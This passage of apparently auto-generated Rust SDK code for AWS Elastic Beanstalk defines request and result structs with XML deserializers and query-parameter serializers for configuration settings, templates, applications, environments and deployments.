ConfigurationOptionSettingsListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionSettingsList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ConfigurationOptionSettingDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } /// Serialize `ConfigurationOptionSettingsList` contents to a `SignedRequest`. 
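// The list serializer below composes with the struct serializer above: each
// element receives a "<name>.member.<index>" prefix (1-based), and
// `ConfigurationOptionSettingSerializer` then appends its own field names.
// For example (values hypothetical), one setting with
// namespace = Some("aws:autoscaling:asg"), option_name = Some("MinSize"),
// and value = Some("2"), serialized under the name "OptionSettings", yields:
//     OptionSettings.member.1.Namespace=aws:autoscaling:asg
//     OptionSettings.member.1.OptionName=MinSize
//     OptionSettings.member.1.Value=2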
struct ConfigurationOptionSettingsListSerializer; impl ConfigurationOptionSettingsListSerializer { fn serialize(params: &mut Params, name: &str, obj: &ConfigurationOptionSettingsList) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); ConfigurationOptionSettingSerializer::serialize(params, &key, obj); } } } pub type ConfigurationOptionSeverity = String; struct ConfigurationOptionSeverityDeserializer; impl ConfigurationOptionSeverityDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionSeverity, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionValue = String; struct ConfigurationOptionValueDeserializer; impl ConfigurationOptionValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionValue, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionValueType = String; struct ConfigurationOptionValueTypeDeserializer; impl ConfigurationOptionValueTypeDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionValueType, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the settings for a specified configuration set.</p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationOptionsDescription { #[doc="<p> A list of <a>ConfigurationOptionDescription</a>. </p>"] pub options: Option<ConfigurationOptionDescriptionsList>, #[doc="<p>The name of the solution stack these configuration options belong to.</p>"] pub solution_stack_name: Option<SolutionStackName>, } struct ConfigurationOptionsDescriptionDeserializer; impl ConfigurationOptionsDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionsDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationOptionsDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "Options" => { obj.options = Some(try!(ConfigurationOptionDescriptionsListDeserializer::deserialize("Options", stack))); } "SolutionStackName" => { obj.solution_stack_name = Some(try!(SolutionStackNameDeserializer::deserialize("SolutionStackName", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the settings for a configuration set.</p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationSettingsDescription { #[doc="<p>The name of the application associated with this configuration set.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The date (in UTC time) when this configuration set was created.</p>"] pub date_created: Option<CreationDate>, #[doc="<p>The date (in UTC time) when this configuration set was last modified.</p>"] pub date_updated: Option<UpdateDate>, #[doc="<p> If this configuration set is associated with an environment, the <code>DeploymentStatus</code> parameter indicates the deployment status of this configuration set: </p> <ul> <li> <p> <code>null</code>: This configuration is not associated with a running environment.</p> </li> <li> <p> <code>pending</code>: This is a draft configuration that is not deployed to the associated environment but is in the process of deploying.</p> </li> <li> <p> <code>deployed</code>: This is the configuration that is currently deployed to the associated running environment.</p> </li> <li> <p> <code>failed</code>: This is a draft configuration that failed to successfully deploy.</p> </li> </ul>"] pub deployment_status: Option<ConfigurationDeploymentStatus>, #[doc="<p>Describes this configuration set.</p>"] pub description: Option<Description>, #[doc="<p> If not <code>null</code>, the name of the environment for this configuration set. </p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>A list of the configuration options and their values in this configuration set.</p>"] pub option_settings: Option<ConfigurationOptionSettingsList>, #[doc="<p>The name of the solution stack this configuration set uses.</p>"] pub solution_stack_name: Option<SolutionStackName>, #[doc="<p> If not <code>null</code>, the name of the configuration template for this configuration set. </p>"] pub template_name: Option<ConfigurationTemplateName>, } struct ConfigurationSettingsDescriptionDeserializer; impl ConfigurationSettingsDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationSettingsDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationSettingsDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "DateCreated" => { obj.date_created = Some(try!(CreationDateDeserializer::deserialize("DateCreated", stack))); } "DateUpdated" => { obj.date_updated = Some(try!(UpdateDateDeserializer::deserialize("DateUpdated", stack))); } "DeploymentStatus" => { obj.deployment_status = Some(try!(ConfigurationDeploymentStatusDeserializer::deserialize("DeploymentStatus", stack))); } "Description" => { obj.description = Some(try!(DescriptionDeserializer::deserialize("Description", stack))); } "EnvironmentName" => { obj.environment_name = Some(try!(EnvironmentNameDeserializer::deserialize("EnvironmentName", stack))); } "OptionSettings" => { obj.option_settings = Some(try!(ConfigurationOptionSettingsListDeserializer::deserialize("OptionSettings", stack))); } "SolutionStackName" => { obj.solution_stack_name = Some(try!(SolutionStackNameDeserializer::deserialize("SolutionStackName", stack))); } "TemplateName" => { obj.template_name = Some(try!(ConfigurationTemplateNameDeserializer::deserialize("TemplateName", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationSettingsDescriptionList = Vec<ConfigurationSettingsDescription>; struct ConfigurationSettingsDescriptionListDeserializer; impl ConfigurationSettingsDescriptionListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationSettingsDescriptionList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ConfigurationSettingsDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>The results from a request to change the configuration settings of an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationSettingsDescriptions { #[doc="<p> A list of <a>ConfigurationSettingsDescription</a>. </p>"] pub configuration_settings: Option<ConfigurationSettingsDescriptionList>, } struct ConfigurationSettingsDescriptionsDeserializer; impl ConfigurationSettingsDescriptionsDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationSettingsDescriptions, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationSettingsDescriptions::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "ConfigurationSettings" => { obj.configuration_settings = Some(try!(ConfigurationSettingsDescriptionListDeserializer::deserialize("ConfigurationSettings", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Provides a list of validation messages.</p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationSettingsValidationMessages { #[doc="<p> A list of <a>ValidationMessage</a>. </p>"] pub messages: Option<ValidationMessagesList>, } struct ConfigurationSettingsValidationMessagesDeserializer; impl ConfigurationSettingsValidationMessagesDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationSettingsValidationMessages, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationSettingsValidationMessages::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Messages" => { obj.messages = Some(try!(ValidationMessagesListDeserializer::deserialize("Messages", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationTemplateName = String; struct ConfigurationTemplateNameDeserializer; impl ConfigurationTemplateNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationTemplateName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationTemplateNamesList = Vec<ConfigurationTemplateName>; struct ConfigurationTemplateNamesListDeserializer; impl ConfigurationTemplateNamesListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationTemplateNamesList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ConfigurationTemplateNameDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Request to create an application.</p>"] #[derive(Default,Debug,Clone)] pub struct CreateApplicationMessage { #[doc="<p>The name of the application.</p> <p>Constraint: This name must be unique within your account. 
If the specified name already exists, the action returns an <code>InvalidParameterValue</code> error.</p>"] pub application_name: ApplicationName, #[doc="<p>Describes the application.</p>"] pub description: Option<Description>, #[doc="<p>Specify an application resource lifecycle configuration to prevent your application from accumulating too many versions.</p>"] pub resource_lifecycle_config: Option<ApplicationResourceLifecycleConfig>, } /// Serialize `CreateApplicationMessage` contents to a `SignedRequest`. struct CreateApplicationMessageSerializer; impl CreateApplicationMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &CreateApplicationMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } if let Some(ref field_value) = obj.resource_lifecycle_config { ApplicationResourceLifecycleConfigSerializer::serialize( params, &format!("{}{}", prefix, "ResourceLifecycleConfig"), field_value, ); } } } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct CreateApplicationVersionMessage { #[doc="<p> The name of the application. If no application is found with this name, and <code>AutoCreateApplication</code> is <code>false</code>, returns an <code>InvalidParameterValue</code> error. </p>"] pub application_name: ApplicationName, #[doc="<p>Set to <code>true</code> to create an application with the specified name if it doesn't already exist.</p>"] pub auto_create_application: Option<AutoCreateApplication>, #[doc="<p>Settings for an AWS CodeBuild build.</p>"] pub build_configuration: Option<BuildConfiguration>, #[doc="<p>Describes this version.</p>"] pub description: Option<Description>, #[doc="<p>Preprocesses and validates the environment manifest and configuration files in the source bundle. Validating configuration files can identify issues prior to deploying the application version to an environment.</p>"] pub process: Option<ApplicationVersionProccess>, #[doc="<p>Specify a commit in an AWS CodeCommit Git repository to use as the source code for the application version.</p>"] pub source_build_information: Option<SourceBuildInformation>, #[doc="<p>The Amazon S3 bucket and key that identify the location of the source bundle for this version.</p> <note> <p>The Amazon S3 bucket must be in the same region as the environment.</p> </note> <p>Specify a source bundle in S3 or a commit in an AWS CodeCommit repository (with <code>SourceBuildInformation</code>), but not both. If neither <code>SourceBundle</code> nor <code>SourceBuildInformation</code> are provided, Elastic Beanstalk uses a sample application.</p>"] pub source_bundle: Option<S3Location>, #[doc="<p>A label identifying this version.</p> <p>Constraint: Must be unique per application. If an application version already exists with this label for the specified application, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p>"] pub version_label: VersionLabel, } /// Serialize `CreateApplicationVersionMessage` contents to a `SignedRequest`. 
struct CreateApplicationVersionMessageSerializer; impl CreateApplicationVersionMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &CreateApplicationVersionMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.auto_create_application { params.put(&format!("{}{}", prefix, "AutoCreateApplication"), &field_value.to_string()); } if let Some(ref field_value) = obj.build_configuration { BuildConfigurationSerializer::serialize( params, &format!("{}{}", prefix, "BuildConfiguration"), field_value, ); } if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } if let Some(ref field_value) = obj.process { params.put(&format!("{}{}", prefix, "Process"), &field_value.to_string()); } if let Some(ref field_value) = obj.source_build_information { SourceBuildInformationSerializer::serialize( params, &format!("{}{}", prefix, "SourceBuildInformation"), field_value, ); } if let Some(ref field_value) = obj.source_bundle { S3LocationSerializer::serialize( params, &format!("{}{}", prefix, "SourceBundle"), field_value, ); } params.put(&format!("{}{}", prefix, "VersionLabel"), &obj.version_label); } } #[doc="<p>Request to create a configuration template.</p>"] #[derive(Default,Debug,Clone)] pub struct CreateConfigurationTemplateMessage { #[doc="<p>The name of the application to associate with this configuration template. If no application is found with this name, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p>"] pub application_name: ApplicationName, #[doc="<p>Describes this configuration.</p>"] pub description: Option<Description>, #[doc="<p>The ID of the environment used with this configuration template.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>If specified, AWS Elastic Beanstalk sets the specified configuration option to the requested value. The new value overrides the value obtained from the solution stack or the source configuration template.</p>"] pub option_settings: Option<ConfigurationOptionSettingsList>, #[doc="<p>The name of the solution stack used by this configuration. The solution stack specifies the operating system, architecture, and application server for a configuration template. It determines the set of configuration options as well as the possible and default values.</p> <p> Use <a>ListAvailableSolutionStacks</a> to obtain a list of available solution stacks. </p> <p> A solution stack name or a source configuration parameter must be specified, otherwise AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p> <p>If a solution stack name is not specified and the source configuration parameter is specified, AWS Elastic Beanstalk uses the same solution stack as the source configuration template.</p>"] pub solution_stack_name: Option<SolutionStackName>, #[doc="<p>If specified, AWS Elastic Beanstalk uses the configuration values from the specified configuration template to create a new configuration.</p> <p> Values specified in the <code>OptionSettings</code> parameter of this call overrides any values obtained from the <code>SourceConfiguration</code>. </p> <p> If no configuration template is found, returns an <code>InvalidParameterValue</code> error. 
</p> <p> Constraint: If both the solution stack name parameter and the source configuration parameters are specified, the solution stack of the source configuration template must match the specified solution stack name or else AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. </p>"] pub source_configuration: Option<SourceConfiguration>, #[doc="<p>The name of the configuration template.</p> <p>Constraint: This name must be unique per application.</p> <p>Default: If a configuration template already exists with this name, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p>"] pub template_name: ConfigurationTemplateName, } /// Serialize `CreateConfigurationTemplateMessage` contents to a `SignedRequest`. struct CreateConfigurationTemplateMessageSerializer; impl CreateConfigurationTemplateMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &CreateConfigurationTemplateMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.option_settings { ConfigurationOptionSettingsListSerializer::serialize( params, &format!("{}{}", prefix, "OptionSettings"), field_value, ); } if let Some(ref field_value) = obj.solution_stack_name { params.put(&format!("{}{}", prefix, "SolutionStackName"), &field_value); } if let Some(ref field_value) = obj.source_configuration { SourceConfigurationSerializer::serialize( params, &format!("{}{}", prefix, "SourceConfiguration"), field_value, ); } params.put(&format!("{}{}", prefix, "TemplateName"), &obj.template_name); } } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct CreateEnvironmentMessage { #[doc="<p>The name of the application that contains the version to be deployed.</p> <p> If no application is found with this name, <code>CreateEnvironment</code> returns an <code>InvalidParameterValue</code> error. </p>"] pub application_name: ApplicationName, #[doc="<p>If specified, the environment attempts to use this value as the prefix for the CNAME. If not specified, the CNAME is generated automatically by appending a random alphanumeric string to the environment name.</p>"] pub cname_prefix: Option<DNSCnamePrefix>, #[doc="<p>Describes this environment.</p>"] pub description: Option<Description>, #[doc="<p>A unique name for the deployment environment. Used in the application URL.</p> <p>Constraint: Must be from 4 to 40 characters in length. The name can contain only letters, numbers, and hyphens. It cannot start or end with a hyphen. This name must be unique in your account. If the specified name already exists, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p> <p>Default: If the CNAME parameter is not specified, the environment name becomes part of the CNAME, and therefore part of the visible URL for your application.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The name of the group to which the target environment belongs. Specify a group name only if the environment's name is specified in an environment manifest and not with the environment name parameter. 
See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-cfg-manifest.html\">Environment Manifest (env.yaml)</a> for details.</p>"] pub group_name: Option<GroupName>, #[doc="<p>If specified, AWS Elastic Beanstalk sets the specified configuration options to the requested value in the configuration set for the new environment. These override the values obtained from the solution stack or the configuration template.</p>"] pub option_settings: Option<ConfigurationOptionSettingsList>, #[doc="<p>A list of custom user-defined configuration options to remove from the configuration set for this new environment.</p>"] pub options_to_remove: Option<OptionsSpecifierList>, #[doc="<p>This is an alternative to specifying a template name. If specified, AWS Elastic Beanstalk sets the configuration values to the default values associated with the specified solution stack.</p> <p> Condition: You must specify either this or a <code>TemplateName</code>, but not both. If you specify both, AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. If you do not specify either, AWS Elastic Beanstalk returns a <code>MissingRequiredParameter</code> error. </p>"] pub solution_stack_name: Option<SolutionStackName>, #[doc="<p>This specifies the tags applied to resources in the environment.</p>"] pub tags: Option<Tags>, #[doc="<p> The name of the configuration template to use in deployment. If no configuration template is found with this name, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p> <p> Condition: You must specify either this parameter or a <code>SolutionStackName</code>, but not both. If you specify both, AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. If you do not specify either, AWS Elastic Beanstalk returns a <code>MissingRequiredParameter</code> error. </p>"] pub template_name: Option<ConfigurationTemplateName>, #[doc="<p>This specifies the tier to use for creating this environment.</p>"] pub tier: Option<EnvironmentTier>, #[doc="<p>The name of the application version to deploy.</p> <p> If the specified application has no associated application versions, AWS Elastic Beanstalk <code>UpdateEnvironment</code> returns an <code>InvalidParameterValue</code> error. </p> <p>Default: If not specified, AWS Elastic Beanstalk attempts to launch the sample application in the container.</p>"] pub version_label: Option<VersionLabel>, } /// Serialize `CreateEnvironmentMessage` contents to a `SignedRequest`. 
struct CreateEnvironmentMessageSerializer; impl CreateEnvironmentMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &CreateEnvironmentMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.cname_prefix { params.put(&format!("{}{}", prefix, "CNAMEPrefix"), &field_value); } if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.group_name { params.put(&format!("{}{}", prefix, "GroupName"), &field_value); } if let Some(ref field_value) = obj.option_settings { ConfigurationOptionSettingsListSerializer::serialize( params, &format!("{}{}", prefix, "OptionSettings"), field_value, ); } if let Some(ref field_value) = obj.options_to_remove { OptionsSpecifierListSerializer::serialize( params, &format!("{}{}", prefix, "OptionsToRemove"), field_value, ); } if let Some(ref field_value) = obj.solution_stack_name { params.put(&format!("{}{}", prefix, "SolutionStackName"), &field_value); } if let Some(ref field_value) = obj.tags { TagsSerializer::serialize( params, &format!("{}{}", prefix, "Tags"), field_value, ); } if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } if let Some(ref field_value) = obj.tier { EnvironmentTierSerializer::serialize( params, &format!("{}{}", prefix, "Tier"), field_value, ); } if let Some(ref field_value) = obj.version_label { params.put(&format!("{}{}", prefix, "VersionLabel"), &field_value); } } } #[doc="<p>Results of a <a>CreateStorageLocationResult</a> call.</p>"] #[derive(Default,Debug,Clone)] pub struct CreateStorageLocationResultMessage { #[doc="<p>The name of the Amazon S3 bucket created.</p>"] pub s3_bucket: Option<S3Bucket>, } struct CreateStorageLocationResultMessageDeserializer; impl CreateStorageLocationResultMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<CreateStorageLocationResultMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = CreateStorageLocationResultMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "S3Bucket" => { obj.s3_bucket = Some(try!(S3BucketDeserializer::deserialize("S3Bucket", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type CreationDate = String; struct CreationDateDeserializer; impl CreationDateDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<CreationDate, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type DNSCname = String; struct DNSCnameDeserializer; impl DNSCnameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DNSCname, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type DNSCnamePrefix = String; #[doc="<p>Request to delete an application.</p>"] #[derive(Default,Debug,Clone)] pub struct DeleteApplicationMessage { #[doc="<p>The name of the application to delete.</p>"] pub application_name: ApplicationName, #[doc="<p>When set to true, running environments will be terminated before deleting the application.</p>"] pub terminate_env_by_force: Option<TerminateEnvForce>, } /// Serialize `DeleteApplicationMessage` contents to a `SignedRequest`. struct DeleteApplicationMessageSerializer; impl DeleteApplicationMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DeleteApplicationMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.terminate_env_by_force { params.put(&format!("{}{}", prefix, "TerminateEnvByForce"), &field_value.to_string()); } } } #[doc="<p>Request to delete an application version.</p>"] #[derive(Default,Debug,Clone)] pub struct DeleteApplicationVersionMessage { #[doc="<p>The name of the application to which the version belongs.</p>"] pub application_name: ApplicationName, #[doc="<p>Set to <code>true</code> to delete the source bundle from your storage bucket. Otherwise, the application version is deleted only from Elastic Beanstalk and the source bundle remains in Amazon S3.</p>"] pub delete_source_bundle: Option<DeleteSourceBundle>, #[doc="<p>The label of the version to delete.</p>"] pub version_label: VersionLabel, } /// Serialize `DeleteApplicationVersionMessage` contents to a `SignedRequest`. 
struct DeleteApplicationVersionMessageSerializer; impl DeleteApplicationVersionMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DeleteApplicationVersionMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.delete_source_bundle { params.put(&format!("{}{}", prefix, "DeleteSourceBundle"), &field_value.to_string()); } params.put(&format!("{}{}", prefix, "VersionLabel"), &obj.version_label); } } #[doc="<p>Request to delete a configuration template.</p>"] #[derive(Default,Debug,Clone)] pub struct DeleteConfigurationTemplateMessage { #[doc="<p>The name of the application to delete the configuration template from.</p>"] pub application_name: ApplicationName, #[doc="<p>The name of the configuration template to delete.</p>"] pub template_name: ConfigurationTemplateName, } /// Serialize `DeleteConfigurationTemplateMessage` contents to a `SignedRequest`. struct DeleteConfigurationTemplateMessageSerializer; impl DeleteConfigurationTemplateMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DeleteConfigurationTemplateMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); params.put(&format!("{}{}", prefix, "TemplateName"), &obj.template_name); } } #[doc="<p>Request to delete a draft environment configuration.</p>"] #[derive(Default,Debug,Clone)] pub struct DeleteEnvironmentConfigurationMessage { #[doc="<p>The name of the application the environment is associated with.</p>"] pub application_name: ApplicationName, #[doc="<p>The name of the environment to delete the draft configuration from.</p>"] pub environment_name: EnvironmentName, } /// Serialize `DeleteEnvironmentConfigurationMessage` contents to a `SignedRequest`. struct DeleteEnvironmentConfigurationMessageSerializer; impl DeleteEnvironmentConfigurationMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DeleteEnvironmentConfigurationMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); params.put(&format!("{}{}", prefix, "EnvironmentName"), &obj.environment_name); } } pub type DeleteSourceBundle = bool; #[doc="<p>Information about an application version deployment.</p>"] #[derive(Default,Debug,Clone)] pub struct Deployment { #[doc="<p>The ID of the deployment. 
This number increases by one each time that you deploy source code or change instance configuration settings.</p>"] pub deployment_id: Option<NullableLong>, #[doc="<p>For in-progress deployments, the time that the deloyment started.</p> <p>For completed deployments, the time that the deployment ended.</p>"] pub deployment_time: Option<DeploymentTimestamp>, #[doc="<p>The status of the deployment:</p> <ul> <li> <p> <code>In Progress</code> : The deployment is in progress.</p> </li> <li> <p> <code>Deployed</code> : The deployment succeeded.</p> </li> <li> <p> <code>Failed</code> : The deployment failed.</p> </li> </ul>"] pub status: Option<String>, #[doc="<p>The version label of the application version in the deployment.</p>"] pub version_label: Option<String>, } struct DeploymentDeserializer; impl DeploymentDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Deployment, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Deployment::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "DeploymentId" => { obj.deployment_id = Some(try!(NullableLongDeserializer::deserialize("DeploymentId", stack))); } "DeploymentTime" => { obj.deployment_time = Some(try!(DeploymentTimestampDeserializer::deserialize("DeploymentTime", stack))); } "Status" => { obj.status = Some(try!(StringDeserializer::deserialize("Status", stack))); } "VersionLabel" => { obj.version_label = Some(try!(StringDeserializer::deserialize("VersionLabel", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } 